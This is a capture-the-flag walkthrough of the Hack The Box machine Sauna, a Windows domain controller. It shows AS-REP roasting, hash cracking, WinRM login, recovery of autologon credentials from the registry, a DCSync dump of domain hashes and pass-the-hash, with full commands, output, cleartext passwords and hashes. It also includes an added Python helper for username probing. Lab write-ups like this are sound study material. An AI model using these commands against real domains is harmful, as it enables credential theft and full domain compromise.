Sauna.htb

This is a detailed walk-thru for sauna.htb written by dR1PPy

The challenges presented by Sauna walk the line between CTF and Real World very well.
It felt good to spend a day roasting in the Sauna while sharpening the Windows attack skills.
As always a big shout out to the machine creator egotisticalSW. It’s friends like you that help keep these challenges fun.

Enumeration

Services
========

host          port   proto  name          state  info
----          ----   -----  ----          -----  ----
10.10.10.175  53     tcp    domain        open   
10.10.10.175  53     udp    domain        open   
10.10.10.175  88     tcp    kerberos-sec  open   Microsoft Windows Kerberos server time: 2020-03-18 06:48:07Z
10.10.10.175  123    udp    ntp           open   
10.10.10.175  135    tcp    msrpc         open   Microsoft Windows RPC
10.10.10.175  139    tcp    netbios-ssn   open   Microsoft Windows netbios-ssn
10.10.10.175  389    tcp    ldap          open   Microsoft Windows Active Directory LDAP Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name
10.10.10.175  389    udp    ldap          open   
10.10.10.175  445    tcp    microsoft-ds  open   
10.10.10.175  464    tcp    kpasswd5      open   
10.10.10.175  593    tcp    ncacn_http    open   Microsoft Windows RPC over HTTP 1.0
10.10.10.175  636    tcp    tcpwrapped    open   
10.10.10.175  3268   tcp    ldap          open   Microsoft Windows Active Directory LDAP Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name
10.10.10.175  3269   tcp    tcpwrapped    open   
10.10.10.175  9389   tcp    mc-nmf        open   .NET Message Framing
10.10.10.175  49667  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.175  49673  tcp    ncacn_http    open   Microsoft Windows RPC over HTTP 1.0
10.10.10.175  49674  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.175  49675  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.175  49686  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.175  49695  tcp    msrpc         open   Microsoft Windows RPC

During our enumeration we find a possible user.

|_    dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL

We run Impacket's GetNPUsers.py (a Kerberos AS-REP roasting script, not an LDAP tool) to validate the username format. The KDC's reply is itself a username oracle: KDC_ERR_C_PRINCIPAL_UNKNOWN means the name does not exist in the domain, while "doesn't have UF_DONT_REQUIRE_PREAUTH set" means the account exists but Kerberos pre-authentication is enforced, so no hash comes back. (Adding -no-pass skips the password prompt.)

python GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -dc-ip sauna.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

No entries found!

python GetNPUsers.py EGOTISTICAL-BANK.LOCAL/hsmith -dc-ip sauna.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] Cannot authenticate hsmith, getting its TGT
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set

python GetNPUsers.py EGOTISTICAL-BANK.LOCAL/hugo -dc-ip sauna.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] Cannot authenticate hugo, getting its TGT
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

Using this same username format (first initial plus surname) we test the other names found on the website's "The Sauna Team" page.

Doing this we also find the valid username 'fsmith'. That account has pre-authentication disabled, so the KDC returns an AS-REP containing material encrypted with the user's key, which is the crackable hash below.
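The following is an added example, not code from the write-up or from Impacket, that automates the bookkeeping around the probe above: it derives candidate usernames from display names and classifies the three kinds of GetNPUsers.py reply (unknown principal, exists but pre-auth enforced, AS-REP returned). The team names other than Hugo Smith, and the AS-REP hash with placeholder hex, are constructed for the example.

```python
"""Added example: username-format derivation and GetNPUsers.py reply classification."""
import re

# Constructed sample names; only "Hugo Smith" comes from the write-up's LDAP output.
TEAM = ["Hugo Smith", "Jane Doe"]

# etype 23 (RC4-HMAC) AS-REP hashes are the ones the write-up cracks with -m 18200.
HASHCAT_MODE = {23: 18200}

# Output lines as GetNPUsers.py prints them; the third is a constructed hash
# in the same shape as the write-up's, with placeholder hex.
SAMPLE_OUTPUT = [
    ("hsmith", "[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set"),
    ("hugo", "[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)"),
    ("jdoe", "$krb5asrep$23$jdoe@EGOTISTICAL-BANK.LOCAL:" + "00" * 16 + "$" + "11" * 32),
]

_UNKNOWN = re.compile(r"KDC_ERR_C_PRINCIPAL_UNKNOWN")
_PREAUTH = re.compile(r"User (\S+) doesn't have UF_DONT_REQUIRE_PREAUTH set")
_ASREP = re.compile(r"^\$krb5asrep\$(\d+)\$([^@]+)@([^:]+):([0-9a-f]+)\$([0-9a-f]+)$")


def candidate_usernames(full_name: str) -> list[str]:
    """Common AD naming conventions for a 'First Last' display name, first-initial+surname first."""
    parts = full_name.lower().split()
    first, last = parts[0], parts[-1]
    forms = [first[0] + last, first + "." + last, first + last, first,
             first + "_" + last, last + first[0], first[0] + "." + last]
    return list(dict.fromkeys(forms))  # dedupe while keeping priority order


def classify(line: str) -> tuple[str, dict]:
    """Map one GetNPUsers.py output line to (status, details)."""
    m = _ASREP.match(line.strip())
    if m:
        etype, user, realm, checksum, enc = m.groups()
        return "roastable", {"user": user, "realm": realm, "etype": int(etype),
                             "checksum": checksum, "enc_len": len(enc) // 2,
                             "hashcat_mode": HASHCAT_MODE.get(int(etype))}
    m = _PREAUTH.search(line)
    if m:
        return "exists", {"user": m.group(1)}
    if _UNKNOWN.search(line):
        return "unknown", {}
    return "other", {}


def probe_results(attempts) -> dict[str, str]:
    """attempts: (username tried, last GetNPUsers.py output line) pairs -> {username: status}."""
    return {user: classify(line)[0] for user, line in attempts}


if __name__ == "__main__":
    for name in TEAM:
        print(name, "->", candidate_usernames(name))
    for user, status in probe_results(SAMPLE_OUTPUT).items():
        print(f"{user:10} {status}")
```

In practice you feed each candidate to GetNPUsers.py (or to a tool such as kerbrute that does the same AS-REQ without a password prompt) and keep only the names that come back as "exists" or "roastable"; anything "unknown" is not a domain principal and can be dropped from later password attacks.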

python GetNPUsers.py EGOTISTICAL-BANK.LOCAL/fsmith -dc-ip sauna.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] Cannot authenticate fsmith, getting its TGT
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:0f109c4e7446bdd44ca5b0dc8fb903e9$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

hashcat -m 18200 --force -a 0 fsmith-hash.txt /TOOL/rockyou.txt --show
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:0f109c4e7446bdd44ca5b0dc8fb903e9$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:Thestrokes23

An anonymous LDAP base query (the rootDSE) is another quick way to confirm the domain naming context:

ldapsearch -LLL -x -H ldap://sauna.htb -b '' -s base '(objectclass=*)'

Gaining Access

To validate our credentials we try to dump the AD info.

python GetADUsers.py -all EGOTISTICAL-BANK.LOCAL/fsmith -dc-ip sauna.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] Querying sauna.htb for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
Administrator                                         2020-01-24 10:14:15.321116  2020-02-10 09:16:17.478519 
Guest                                                 <never>              <never>             
krbtgt                                                2020-01-22 22:45:30.587720  <never>             
HSmith                                                2020-01-22 22:54:34.140321  <never>             
FSmith                                                2020-01-23 09:45:19.047096  2020-03-18 20:31:24.039258 
svc_loanmgr                                           2020-01-24 16:48:31.678079  <never> 

Ok looks like we have all we need to get our shell.

evil-winrm -i sauna.htb -u fsmith -p Thestrokes23 -s '/var/www/html/win' -e '/var/www/html/win/'

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../
*Evil-WinRM* PS C:\Users\FSmith> cd Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt

Escalating Privileges

We copy over WinPEAS.bat to help us with enumeration.
After reviewing the output we notice the following.

Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
    DefaultDomainName    REG_SZ    EGOTISTICALBANK
    DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!

The registry names the account 'svc_loanmanager', but our earlier AD dump shows the real sAMAccountName is 'svc_loanmgr', so we connect back with that user. Autologon credentials in the Winlogon key sit in cleartext in a key that any authenticated user can read, which is why a low-privileged shell is enough to recover them.

evil-winrm -i sauna.htb -u svc_loanmgr -p Moneymakestheworldgoround! -s '/var/www/html/win' -e '/var/www/html/win/'

Now we have another set of credentials to leverage. But how?

Standard host enumeration turns up nothing, so we look at what this account can do against the domain itself. secretsdump.py from Impacket with -just-dc uses the DRSUAPI replication interface (the DCSync technique) to pull every hash out of NTDS.DIT without ever touching the file; it only works if the account holds the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights on the domain, and the successful dump below shows svc_loanmgr has them.

./secretsdump.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK/svc_loanmgr@10.10.10.175 -just-dc
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:d7f0c9f6fe1513213f825b3793e647ae:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:68e94a6f31b980eb073819802d9e1fda0178eb7431cc0a546c7dc57993cdbbfe
SAUNA$:aes128-cts-hmac-sha1-96:1b61a8449f192bdc9a1f019dcd2adaa0
SAUNA$:des-cbc-md5:104c515b86739e08
[*] Cleaning up... 

Now that we have the Administrator NT hash we pass the hash with wmiexec.py (the LM half is just the empty-LM constant) to get our flag; no cracking needed.

python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff Administrator@10.10.10.175
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>cd users\Administrator\Desktop
C:\users\Administrator\Desktop>type root.txt

And now we can leave the sauna nice and roasted.
Thanks for Playing Today!

Resources

Sauna.htb
https://www.hackthebox.eu/home/machines/profile/229

https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/winPEAS/winPEASbat/winPEAS.bat
